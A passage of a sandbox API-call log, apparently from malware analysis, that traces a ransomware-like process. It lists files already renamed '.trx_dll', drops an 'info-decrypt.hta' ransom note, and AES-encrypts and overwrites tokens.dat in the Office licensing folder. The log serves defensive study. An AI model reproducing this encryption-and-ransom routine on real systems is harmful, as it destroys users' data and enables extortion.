ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0x1a560, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUB6INTL.DLL.trx_dll", cAlternateFileName="PUB6IN~1.TRX")) returned 1 [0212.268] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x57655500, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x57655500, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0x87f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUB6INTL.REST.trx_dll", cAlternateFileName="PUB6IN~2.TRX")) returned 1 [0212.269] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2720b500, ftCreationTime.dwHighDateTime=0x1cac80f, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x2720b500, ftLastWriteTime.dwHighDateTime=0x1cac80f, nFileSizeHigh=0x0, nFileSizeLow=0x57f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUBWZINT.REST.trx_dll", cAlternateFileName="PUBWZI~1.TRX")) returned 1 [0212.269] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x94d0df00, ftCreationTime.dwHighDateTime=0x1cac817, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x94d0df00, ftLastWriteTime.dwHighDateTime=0x1cac817, nFileSizeHigh=0x0, nFileSizeLow=0x3360, dwReserved0=0x0, dwReserved1=0x0, cFileName="SGRES.DLL.trx_dll", cAlternateFileName="SGRESD~1.TRX")) returned 1 [0212.269] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca190500, ftCreationTime.dwHighDateTime=0x1cac7f6, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xca190500, ftLastWriteTime.dwHighDateTime=0x1cac7f6, nFileSizeHigh=0x0, nFileSizeLow=0x4360, dwReserved0=0x0, dwReserved1=0x0, cFileName="STINTL.DLL.trx_dll", cAlternateFileName="STINTL~1.TRX")) returned 1 [0212.269] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf706700, ftCreationTime.dwHighDateTime=0x1cac81a, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbf706700, ftLastWriteTime.dwHighDateTime=0x1cac81a, nFileSizeHigh=0x0, nFileSizeLow=0x6960, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISBRRES.DLL.trx_dll", cAlternateFileName="VISBRR~1.TRX")) returned 1 [0212.269] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70273800, ftCreationTime.dwHighDateTime=0x1cac814, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x70273800, ftLastWriteTime.dwHighDateTime=0x1cac814, nFileSizeHigh=0x0, nFileSizeLow=0x73960, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISINTL.DLL.trx_dll", cAlternateFileName="VISINT~1.TRX")) returned 1 [0212.270] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa1789a00, ftCreationTime.dwHighDateTime=0x1cacd25, ftLastAccessTime.dwLowDateTime=0xef0ca650, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa1789a00, ftLastWriteTime.dwHighDateTime=0x1cacd25, nFileSizeHigh=0x0, nFileSizeLow=0x24360, dwReserved0=0x0, dwReserved1=0x0, cFileName="WWINTL.DLL.trx_dll", cAlternateFileName="WWINTL~1.TRX")) returned 1 [0212.270] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa2a9c700, ftCreationTime.dwHighDateTime=0x1cacd25, ftLastAccessTime.dwLowDateTime=0xef0f07b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa2a9c700, ftLastWriteTime.dwHighDateTime=0x1cacd25, nFileSizeHigh=0x0, nFileSizeLow=0x110b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="WWINTL.REST.trx_dll", cAlternateFileName="WWINTL~2.TRX")) returned 1 [0212.270] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x61df1900, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef0f07b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x61df1900, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x23960, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLINTL32.DLL.trx_dll", cAlternateFileName="XLINTL~1.TRX")) returned 1 [0212.270] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x61df1900, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x61df1900, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x126760, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLINTL32.REST.trx_dll", cAlternateFileName="XLINTL~2.TRX")) returned 1 [0212.270] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd7e38000, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xd7e38000, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x3960, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSLICER.DLL.trx_dll", cAlternateFileName="XLSLIC~1.TRX")) returned 1 [0212.271] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd7e38000, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xd7e38000, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x3960, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSLICER.DLL.trx_dll", cAlternateFileName="XLSLIC~1.TRX")) returned 0 [0212.272] FindClose (in: hFindFile=0xb7f0d0 | out: hFindFile=0xb7f0d0) returned 1 [0212.273] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0212.273] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0212.273] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0212.273] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform", lpFilePart=0x0) returned 0x39 [0212.273] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\", lpFilePart=0x0) returned 0x3a [0212.273] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0xfa44d4a0, ftLastWriteTime.dwHighDateTime=0x1d305fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f0d0 [0212.274] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0xfa44d4a0, ftLastWriteTime.dwHighDateTime=0x1d305fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0212.274] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9de525d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cache", cAlternateFileName="")) returned 1 [0212.275] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c015050, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0x63c5e40, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x469bd5, dwReserved0=0x0, dwReserved1=0x0, cFileName="tokens.dat", cAlternateFileName="")) returned 1 [0212.275] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0212.275] FindClose (in: hFindFile=0xb7f0d0 | out: hFindFile=0xb7f0d0) returned 1 [0212.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0212.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0212.275] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0212.275] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform", lpFilePart=0x0) returned 0x39 [0212.275] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\", lpFilePart=0x0) returned 0x3a [0212.275] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0xfa44d4a0, ftLastWriteTime.dwHighDateTime=0x1d305fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f0d0 [0212.276] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0xfa44d4a0, ftLastWriteTime.dwHighDateTime=0x1d305fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0212.276] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9de525d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cache", cAlternateFileName="")) returned 1 [0212.276] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c015050, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0x63c5e40, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x469bd5, dwReserved0=0x0, dwReserved1=0x0, cFileName="tokens.dat", cAlternateFileName="")) returned 1 [0212.277] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c015050, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0x63c5e40, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x469bd5, dwReserved0=0x0, dwReserved1=0x0, cFileName="tokens.dat", cAlternateFileName="")) returned 0 [0212.277] FindClose (in: hFindFile=0xb7f0d0 | out: hFindFile=0xb7f0d0) returned 1 [0212.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0212.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0212.277] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat", nBufferLength=0x105, lpBuffer=0x691eea0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat", lpFilePart=0x0) returned 0x44 [0212.277] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691eea8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\info-decrypt.hta", lpFilePart=0x0) returned 0x4a [0212.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f308) returned 1 [0212.277] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f384 | out: lpFileInformation=0x691f384*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0212.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f304) returned 1 [0212.277] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat", nBufferLength=0x105, lpBuffer=0x691eea0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat", lpFilePart=0x0) returned 0x44 [0212.278] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ed48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\info-decrypt.hta", lpFilePart=0x0) returned 0x4a [0212.278] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f23c) returned 1 [0212.278] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x208 [0212.278] GetFileType (hFile=0x208) returned 0x1 [0212.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f238) returned 1 [0212.278] GetFileType (hFile=0x208) returned 0x1 [0212.279] WriteFile (in: hFile=0x208, lpBuffer=0x37af4d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x691f300, lpOverlapped=0x0 | out: lpBuffer=0x37af4d8*, lpNumberOfBytesWritten=0x691f300*=0x1000, lpOverlapped=0x0) returned 1 [0212.280] WriteFile (in: hFile=0x208, lpBuffer=0x37af4d8*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x691f2d4, lpOverlapped=0x0 | out: lpBuffer=0x37af4d8*, lpNumberOfBytesWritten=0x691f2d4*=0x55e, lpOverlapped=0x0) returned 1 [0212.280] CloseHandle (hObject=0x208) returned 1 [0212.281] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat", nBufferLength=0x105, lpBuffer=0x691eea8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat", lpFilePart=0x0) returned 0x44 [0212.281] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f354) returned 1 [0212.281] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), fInfoLevelId=0x0, lpFileInformation=0x37b04f4 | out: lpFileInformation=0x37b04f4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c015050, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0x63c5e40, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x469bd5)) returned 1 [0212.281] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f350) returned 1 [0212.281] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat", nBufferLength=0x105, lpBuffer=0x691ed94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat", lpFilePart=0x0) returned 0x44 [0212.281] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f288) returned 1 [0212.281] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x208 [0212.281] GetFileType (hFile=0x208) returned 0x1 [0212.281] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f284) returned 1 [0212.282] GetFileType (hFile=0x208) returned 0x1 [0212.282] GetFileSize (in: hFile=0x208, lpFileSizeHigh=0x691f390 | out: lpFileSizeHigh=0x691f390*=0x0) returned 0x469bd5 [0212.282] ReadFile (in: hFile=0x208, lpBuffer=0x15f33fa8, nNumberOfBytesToRead=0x469bd5, lpNumberOfBytesRead=0x691f33c, lpOverlapped=0x0 | out: lpBuffer=0x15f33fa8*, lpNumberOfBytesRead=0x691f33c*=0x469bd5, lpOverlapped=0x0) returned 1 [0212.966] CloseHandle (hObject=0x208) returned 1 [0212.966] CryptAcquireContextW (in: phProv=0x691f2dc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f2dc*=0xbdfbf0) returned 1 [0212.967] CryptGenRandom (in: hProv=0xbdfbf0, dwLen=0x10, pbBuffer=0x364b4a8 | out: pbBuffer=0x364b4a8) returned 1 [0213.578] CryptImportKey (in: hProv=0xbdfbf0, pbData=0x36627c8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f2ac | out: phKey=0x691f2ac*=0xb7f410) returned 1 [0213.578] CryptContextAddRef (hProv=0xbdfbf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0213.578] CryptContextAddRef (hProv=0xbdfbf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0213.578] CryptDuplicateKey (in: hKey=0xb7f410, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f29c | out: phKey=0x691f29c*=0xb7fb10) returned 1 [0213.578] CryptContextAddRef (hProv=0xbdfbf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0213.578] CryptSetKeyParam (hKey=0xb7fb10, dwParam=0x4, pbData=0x36628a8*=0x1, dwFlags=0x0) returned 1 [0213.578] CryptSetKeyParam (hKey=0xb7fb10, dwParam=0x1, pbData=0x3662874, dwFlags=0x0) returned 1 [0213.785] CryptEncrypt (in: hKey=0xb7fb10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b2fb2c8*, pdwDataLen=0x691f308*=0x469be0, dwBufLen=0x469be0 | out: pbData=0x1b2fb2c8*, pdwDataLen=0x691f308*=0x469be0) returned 1 [0213.829] CryptEncrypt (in: hKey=0xb7fb10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36628d0*, pdwDataLen=0x691f310*=0x0, dwBufLen=0x10 | out: pbData=0x36628d0*, pdwDataLen=0x691f310*=0x10) returned 1 [0213.831] CryptDestroyKey (hKey=0xb7f410) returned 1 [0213.831] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0213.987] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0213.987] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat", nBufferLength=0x105, lpBuffer=0x691ed80, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat", lpFilePart=0x0) returned 0x44 [0213.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f274) returned 1 [0213.987] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x598 [0213.993] GetFileType (hFile=0x598) returned 0x1 [0213.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f270) returned 1 [0213.993] GetFileType (hFile=0x598) returned 0x1 [0213.993] WriteFile (in: hFile=0x598, lpBuffer=0x36f4f00*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x691f304, lpOverlapped=0x0 | out: lpBuffer=0x36f4f00*, lpNumberOfBytesWritten=0x691f304*=0x20, lpOverlapped=0x0) returned 1 [0213.994] CloseHandle (hObject=0x598) returned 1 [0213.995] CoTaskMemAlloc (cb=0x20c) returned 0x66cdfc8 [0213.995] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x66cdfc8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0213.995] CoTaskMemFree (pv=0x66cdfc8) [0213.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x691ed68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0213.995] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f2b0 | out: ppv=0x691f2b0*=0xb51e34) returned 0x0 [0213.996] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f2a8 | out: pAptType=0x691f2a8*=1) returned 0x0 [0213.996] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f2ac | out: ppvObject=0x691f2ac*=0x0) returned 0x80004002 [0213.996] IUnknown:Release (This=0xb51e34) returned 0x1 [0213.997] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691ec18 | out: ppv=0x691ec18*=0x60273d0) returned 0x0 [0213.997] WbemDefPath:IUnknown:QueryInterface (in: This=0x60273d0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691ee30 | out: ppvObject=0x691ee30*=0x0) returned 0x80004002 [0213.997] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60273d0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ee44 | out: ppvObject=0x691ee44*=0x6029f80) returned 0x0 [0213.997] 